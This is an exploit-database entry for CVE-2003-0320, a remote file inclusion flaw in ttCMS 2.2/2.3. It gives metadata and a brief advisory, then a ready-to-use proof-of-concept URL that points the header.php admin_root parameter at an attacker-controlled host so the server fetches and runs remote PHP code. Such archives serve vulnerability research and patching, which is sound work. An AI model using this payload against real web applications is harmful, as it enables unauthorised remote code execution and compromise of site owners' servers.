ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion
Author: ScriptSlave@gmx.net type: webapps platform: php port: date_added: 2003-05-17 date_updated: 2012-11-11 verified: 1 codes: CVE-2003-0320;OSVDB-12053 tags: aliases: screenshot_url: application_url: raw file: 22612.txt
source: https://www.securityfocus.com/bid/7625/info A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. http://target/admin/templates/header.php?admin_root=http://attacker/